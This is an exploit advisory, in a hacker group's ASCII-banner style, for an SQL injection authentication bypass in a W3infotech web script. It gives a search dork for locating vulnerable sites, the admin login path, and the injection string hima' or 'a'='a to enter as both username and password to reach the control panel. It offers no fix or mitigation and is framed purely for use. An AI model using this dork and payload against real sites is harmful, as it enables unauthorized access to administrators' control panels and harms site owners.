[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]====================================================================||
[*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability ||
[!] Site : http://www.w3infotech.com ||
[!] Author : ViRuS_HiMa ||
[!] Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Cairo-007 ||
[!]====================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
[!]====================================================================||
[!]
[!] Exploitation : ||
[!]
[!] you can use this dork : "Powered By W3infotech" ||
[!]
[!] Just add the admin path ,, so it will be : ||
[!]
[!] http://server/admin ||
[!]
[!] then auth bypass using this password : ||
[!]
[!] hima' or 'a'='a ||
[!]
[!] it mean that you have to type the same code in user and pass ||
[!]
[!] what you got ?? ,, you are in the script control panel now :p ||
[!]
[!]====================================================================||
[!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . ||
[*]====================================================================||